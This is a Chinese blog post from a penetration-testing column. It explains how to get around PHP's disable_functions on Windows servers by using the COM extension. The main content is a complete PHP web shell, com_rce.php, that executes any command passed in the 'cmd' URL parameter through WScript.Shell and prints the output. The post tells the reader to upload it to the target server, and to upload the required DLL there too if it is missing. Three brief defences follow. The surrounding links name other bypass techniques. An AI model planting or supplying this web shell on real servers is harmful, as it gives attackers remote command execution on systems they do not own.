利用Windows COM组件Bypass disable_functions

最新推荐文章于 2022-04-21 18:47:15 发布
最新推荐文章于 2022-04-21 18:47:15 发布
阅读量836 收藏 1
点赞数 1
分类专栏: 渗透测试 文章标签: php 网络安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhanglichon666/article/details/111212860
版权

利用Windows COM组件Bypass disable_functions

关于Windows COM组件,这里不作阐述,直接展示我的利用姿势。

利用条件:

  1. php.ini中com.allow_dcom的值为true且extension=php_com_dotnet.dll;
    (Tips1:PHP 7版本开始要自己添加扩展extension=php_com_dotnet.dll)
    (Tips2:com.allow_dcom的值默认为false)
  2. php/ext/目录下存在php_com_dotnet.dll文件
    (Tips3:如果目标服务器中没有此文件,则上传一个php_com_dotnet.dll文件至目标服务器)
  3. 目标服务器为Windows系统且使用PHP语言

利用方法:

0x01 上传com_rce.php文件至服务器

在Windows环境中PHP中的COM()函数可以创建系统组件对象来运行系统命令,上传com_rce.php文件,内容如下:

<?php
$command = $_GET['cmd'];
$wsh = new COM('WScript.shell');
$exec = $wsh->exec("cmd /c".$command);
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput;
?>

(摘自酒仙桥:https://mp.weixin.qq.com/s/BiBSwt8JO99JnCfK1pMjJw
(PS:当时我按照酒仙桥文章里的这一段文件内容时会报错 “Parse error: syntax error, unexpected ‘*’ in D:\phpstudy_old\PHPTutorial\WWW\com_rce.php on line 5”,于是经过查阅资料,发现上面我提供的代码能有效远程命令执行。)

0x02 远程命令执行

在这里插入图片描述
防御方法:

  1. 将System32目录下的wshom.ocx文件删除;(推荐,杜绝)
  2. 删除php/ext/目录下的php_com_dotnet.dll文件,防止被恶意利用;
  3. 将com.allow.dcom的值设置为false;
XXR_Beta
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
com 组件调用不起来_COM组件绕过disable_functions
weixin_39555951的博客
11-21 388
介绍com组件绕过适用于windows系统,组件可理解为提供某个功能的程序,主要是php代码调用windows下的WScript.shell组件来操作的。wscript.shellWScript.shell组件可用来操作cmd程序,可调用cmd程序来执行相关命令。在php中我们可以新建组件去调用wscript.shell,然后来操作cmd,从而来执行相关命令。条件php默认是不能调用外部...
windows,linux 蚁剑下载与安装 与 手动安装插件disable_functions
热门推荐
Sk1y的博客
08-15 1万+
windows,linux蚁剑下载与安装,disable_functions插件手动安装与使用
Bypass disable_functions .htaccess方法的几种姿势
weixin_43888558的博客
06-29 377
一、前言 在击剑(渗透)过程中,总会遇到disable_functions禁用函数的情况,在前段时间刚结束红帽杯初赛中,有一道bypass disable_functions的web题,虽然蚁剑有插件可以直接打穿,但蚁剑毕竟乃身外之物,身为一个剑客,总得有真才实学,所以针对.htaccess的方法进行了一些研究,总结出了几种姿势。 二、前置知识 .htaccess文件又称为分布式配置文件,顾名思义就是可以作为配置文件实现一些功能,在这里我们可以利用它来添加自定义的后缀并作为cgi程序运行,绕过disable
disable_functions绕过总结
闵行小鱼塘
05-18 1880
总结下disable_functions绕过的一些方法
蚁剑的能绕过disable_functions的插件
06-21
蚁剑的能绕过disable_functions的插件,插件无法下载问题
PHP通过bypass disable functions执行系统命令的方法汇总
12-18
一、为什么要bypass disable functions 为了安全起见,很多运维人员会禁用PHP的一些“危险”函数,例如eval、exec、system等,将其写在php.ini配置文件中,就是我们所说的disable functions了,特别是虚拟主机运营商...
从ByteCTF到bypass_disable_function1
08-03
标题中的"从ByteCTF到bypass_disable_function1"指的是在网络安全竞赛ByteCTF中涉及到的一个技术挑战,即如何绕过`disable_function`的安全限制。`disable_function`是PHP配置中的一个选项,用于禁用某些可能带来...
Disable-Windows-Defender_BypassDefender_windows_
10-01
标题“Disable-Windows-Defender_BypassDefender_windows_”暗示了这个压缩包可能包含一系列方法或工具,用于禁用Windows Defender,这是微软操作系统内置的一种安全防护软件,主要用于防范病毒、间谍软件和其他恶意...
PHP绕过disable_function限制
qq_44657899的博客
10-19 2633
文章目录寻找未禁用函数 寻找未禁用函数 一些读取目录的函数: print_r(scandir("/")); var_dump(scandir("/")); 读取文件的函数: highlight_file('flag.php'); include('/flag'); show_source(); require();
comdisable串口鼠标禁用工具
09-11
调试串口时,因为串口设备被识别成鼠标导致鼠标乱飞,串口取不到数据comdisable.msi comdisable 串口鼠标禁用工具
禁用串口鼠标工具comdisable安装包.rar
09-04
软件介绍: 两种不同的禁用串口鼠标工具,comdisable对WIN7系统有效。之所以禁用串口鼠标,是因为在调试串口,使用USB转串口设备时,串口设备容易被识别成鼠标导致鼠标不受控制,串口取不到数据。在波特率与默认波特率不匹配的情况下导致windows系统将该串口设备错误识别为串口鼠标设备。两种方式进行解决:1、安装comdisable.msi。2、将usb2ttl.reg导入到系统注册表。
Windowscom及word
Liuqz2009的专栏
04-21 972
读写 Word 日常开发的软件使用最多的应该是导出数据到Word文档中,目前可以用的方案有这几种 COM 简介 Microsoft 组件对象模型 (COM) 是一个独立于平台的分布式面向对象的系统,用于创建可交互的二进制软件组件COM 是 Microsoft 的 OLE (复合文档) 、ActiveX (Internet 组件) 等的基础技术。 若要了解 COM (所有基于 COM 的技术) ,必须了解它不是面向对象的语言,而是一种标准。 用于创建在运行时进行交互的可重用的软件库。 无...
绕过宝塔禁止的php函数,宝塔disable functions函数全被禁命令执行+加域服务器如何无限制执行命令...
weixin_42193786的博客
04-08 1679
本地搭建实验环境时遇到了不少小问题实验环境2008 R2宝塔搭建的IIS discuz3.2X手动上传shell冰蝎连接(ps:有表哥使用冰蝎的时候提示文件存在但是无法获取密钥,解决办法,使用最新版本的冰蝎即可,具体详情看更新日志)连接上shell发现无法执行命令???查看phpinfo原来是禁用了函数……几乎能用的都禁用了想想很奇怪,刚搭建的网站那就是是默认值,为啥平时日站不是这样的,东查西查之...
开始php脚本,php bypass disable function
weixin_42393261的博客
03-21 434
前言最近开学,事太多了,好久没更新了,然后稍微闲一点一直在弄这个php bypass disable function,一开始自己的电脑win10安装蚁剑的插件,一直报错。怀疑是必须linux环境。下载github上官方源码又显示压缩包有问题,被搞了几天,心态爆炸。今天登github上下载又莫名其妙可以压缩了。装在虚拟机里,总算可以用了。Bypass Disable Functions 专题什么是...
PHP中通过bypass disable functions执行系统命令的几种方式
weixin_33734785的博客
05-04 285
原文:http://www.freebuf.com/articles/web/169156.html 一、为什么要bypass disable functions 为了安全起见,很多运维人员会禁用PHP的一些“危险”函数,例如eval、exec、system等,将其写在php.ini配置文件中,就是我们所说的disable functions了,特别是虚拟主机运营商,为了彻底隔离同服务器的客户...
bypass disable_function
lonmar的博客
11-26 795
主要参考https://www.anquanke.com/post/id/208451 0x01 LD_PRELOAD LD_PRELOAD是什么 : 参考 警惕UNIX下的LD_PRELOAD环境变量 https://blog.csdn.net/haoel/article/details/1602108 绕过原理: https://blog.csdn.net/weixin_33738982/article/details/87979967 攻击思路: 1. 有上传权限,上传特定的PHP脚本,hack..
ping命令执行及bypass
L1ni01
11-27 986
ping命令执行及bypass 管道符 windows 下 |直接执行后面的语句 ||如果前面命令是错的那么就执行后面的语句,否则只执行前面的语句 &前面和后面命令都要执行,无论前面真假 &&如果前面为假,后面的命令也不执行,如果前面为真则执行两条命令 Linux 下 ;前面和后面命令都要执行,无论前面真假 |直接执行后面的语句 ||如果前面命令是错的那么就执行后面的语句,否则只执行前面的语句 &前面和后面命令都要执行,无论前面真假 &&如果前面为假,后
php 5.2.17p1 disable_function bypass 求指点
qq_28247467的博客
03-30 1218
也许这点乌云币少了点,可是再多我就掉到路人了。期望有人来指点一下。 小菜碰到了一个硬茬,摸索了好长时间,终究不得破解,心中很是抑郁。。。我倒是也没什么目的,可是问题不解决就心里不舒畅。 目标情况: 是linux的系统,我的目的就是想能执行命令,获得command line shell ,能不能获取root是其次,就是气不过试过好多方法都不能绕过去执行命令。 php.
as_bypass_php_disable_functions-master
最新发布
09-17
as_bypass_php_disable_functions-master是一个可以绕过PHP禁用函数的项目。 在PHP中,禁用函数是一种安全措施,用于限制脚本执行时可以调用的函数。这样可以防止恶意代码的执行,提高服务器的安全性。 然而,有...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值